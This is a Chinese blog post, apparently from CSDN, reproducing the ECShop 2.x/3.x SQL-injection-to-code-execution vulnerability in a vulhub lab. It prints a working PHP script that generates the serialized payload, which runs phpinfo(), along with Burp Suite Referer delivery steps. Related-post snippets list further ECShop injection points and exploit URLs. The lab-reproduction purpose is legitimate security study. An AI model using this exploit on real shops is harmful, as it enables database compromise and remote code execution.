ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 漏洞复现

最新推荐文章于 2023-04-09 18:50:35 发布
原创 最新推荐文章于 2023-04-09 18:50:35 发布
· 876 阅读 · 3 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全漏洞 #网络安全 #渗透测试

本文揭示了ECShop旧版本的SQL注入漏洞,详细介绍了利用过程,包括抓包、脚本生成和环境配置,以及修复前版本的POC示例。漏洞复现和参考资料对于安全人员理解和修复至关重要。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ECShop 2.x / 3.x SQL注入/远程执行代码漏洞

by ADummy

0x00利用路线

​ Burpsuite抓包—>脚本生成poc—>Burpsuite修改referer字段—>有回显

0x01漏洞介绍

​ ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0已修复此漏洞,vulhub使用其最新版本2.7.3和3.6.0非最新版本来重现该漏洞

0x02漏洞复现

有一个脚本可以为2.x和3.x生成POC:

<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";

启动环境后,访问http://your-ip:8080,您将看到2.7.3安装页面。访问http://your-ip:8081,您将看到3.6.0安装页面。都安装它们,mysql地址为mysql,mysql帐户和密码为root,数据库名称可以自由填写,但是2.7.3和3.6.0的数据库名称不能相同。
在这里插入图片描述
生成poc:
在这里插入图片描述
2.7:
在这里插入图片描述
3.x:
在这里插入图片描述

0x03参考资料

poc:https://github.com/ADummmy/vulhub_Writeup/blob/main/code/ecshop_sql_rce_exp.php

[ vulhub漏洞复现篇 ] ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600
qq_51577576的博客
09-25 1418
[ vulhub漏洞复现篇 ] ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0已修复此漏洞,vulhub使用其最新版本2.7.33.6.0非最新版本来重现该漏洞
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入
qq_51577576的博客
10-01 1980
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入ECShop是上海商派网络科技有限公司(ShopEx)旗下——B2C独立网店系统,适合企业及个人快速构建个性化网上商店,系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
ECShop 2.x/3.x SQL注入/任意代码执行漏洞复现
weixin_51387754的博客
11-15 424
漏洞原理 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞 ,通过该漏洞注入恶意数据,最终导致任意代码执行漏洞。 影响版本 ECShop 2.x ECShop 3.x 漏洞复现 (root????guiltyfet)-[/home/guiltyfet/vulhub/ecshop/xianzhi-2017-02-82239600] └─# docker-compos
ECSHOP v2.7.3注入漏洞分析和修复
weixin_34334744的博客
04-13 1293
测试版本 漏洞条件 漏洞利用 产生原因 修复方案 1.测试版本 v2.7.3 RELEASE 20121106(最新) v2.7.3 RELEASE 20120411 2.漏洞条件 需登录到后台 3.漏洞利用 1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息” 为什么要搜索“用户信息”,还可以搜索其它的吗? 答案是搜索languages\zh_cn\u...
20.Ecshop 2.x/3.x SQL注入/任意代码执行漏洞
weixin_30588827的博客
11-13 377
Ecshop 2.x/3.x SQL注入/任意代码执行漏洞 影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代...
ecshop的48个泄露网站路径漏洞
weixin_33998125的博客
04-21 191
http://网站/shop/api/cron.php http://网站/shop/wap/goods.php http://网站/shop/temp/compiled/ur_here.lbi.php http://网站/shop/temp/compiled/pages.lbi.php http://网站/shop/temp/compiled/user_transa...
Eecshop 4.x collection_list SQL注入 漏洞复现
weixin_44896127的博客
12-20 821
Eecshop 4.x collection_list SQL注入漏洞复现
ECShop_V2.6.2_UTF8_Release0326.zip
02-04
然而,这个版本存在一些重要的安全问题,特别是关于"ecshop2.2 ecshop2.x代码执行漏洞"的标签所提及的,这是一个对系统安全性构成威胁的重要知识点。 1. **代码执行漏洞**:在ECShop V2.6.2中,存在代码执行漏洞...
BaizeSec#bylibrary#ecshop2.x_命令执行1
07-25
代码执行在网站根目录下生成1.php的一句话。
Ecshop 漏洞集合
收集盒 Book box
03-31 3262
Ecshop 漏洞集合一、EXP:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWx
ecshop常见漏洞
10-30
ecshop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库;跨站攻击; ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞ecshop的后台编辑文件/admin/affiliate_ck.php中,对输入参数auid未进行正确类型转义,导致整型注入的发生;ecshop的后台编辑文件/admin/shophelp.php中 shopinfo.php ,对输入参数$_POST[&#39;id&#39;]未进行正确类型转义,导致整型注入的发生;ecshop的/admin/comment_manage.php中,对输入参数sort_by、sort_order未进行严格过滤,导致SQL注入ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库; ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/modules/payment/alipay.php文件中,该文件是ECshop的支付宝插件。由于ECShop使用了str_replace函数做字符串替换,黑客可绕过单引号限制构造SQL注入语句。只要开启支付宝支付插件就能利用该漏洞获取网站数据,且不需要注册登入;ecshop的/includes/lib_insert.php文件中,对输入参数未进行正确类型转义,导致整型注入的发生。
ECshop漏洞利用工具
11-11
ECshop漏洞利用工具 专门挖掘ECshop漏洞利用工具的漏洞,所以很好很强大的哦
ECShop 2.x/3.x SQL注入/远程代码执行漏洞
SwBack的博客
04-09 1686
ecshop 漏洞主要是因为 user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.不需要登录即可远程写入webshell。
ecshop的code.php漏洞,代码审计|ECShop-V3.0.0 漏洞集合
weixin_36461619的博客
04-13 987
0x00 背景不久前对ECShop-V3.0.0进行了一次粗浅的审计,还是发现了一些问题。本篇分析的漏洞利用条件是比较苛刻的,但是重要的是能够在审计的过程中学习到新的思路和知识,期待和师傅们的交流讨论。0x01 漏洞分析配置文件写入导致代码执行0x00 相关环境源码信息:ECShop-V3.0.0-UTF8-release0530问题文件: \ECShop30\install\index.php漏...
Ecshop漏洞及修复
欣馨密语
05-11 1528
ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 */ if (get_magic_...
ECShop 2.7.2 最新任意用户登陆漏洞
hypocode的专栏
05-05 390
本文转载自 http://www.risecq.com/ecshop-2-7-2-%E6%9C%80%E6%96%B0%E6%BC%8F%E6%B4%9E 由于最近项目需要, 查看了下商派最新发布的ECShop 2.7.2正式版的源代码, 没想到在看到第二个文件时就发现了一处比较明显, 且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台
ecshop漏洞user.php,ECShop 2.x 3.0代码执行漏洞分析
weixin_31240035的博客
03-23 803
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。0x00 前言ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。2.x版本跟3.0版本存在代码执行漏洞。0x01 漏洞原理ECShop 没有对 $GLOBAL[‘_SERVER’][‘HTTP_REFERER’] 变量进行验证,导致用户可以将任意代码插入的u...
ecshop 2.6.2 版本的sql注入漏洞
yangjiehuan的专栏
08-24 1414
简要:      这个漏洞不是我发现的。现在目前2.7.3也已经改了,所以放上来,是为了说明变量初始化的重要性。 refer link:http://bbs.wolvez.org/viewtopic.php?pid=179#p179 内容: 影响2.5.x和2.6.x,其他版本未测试 goods_script.php44行:     if (empty($_GET['type']
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值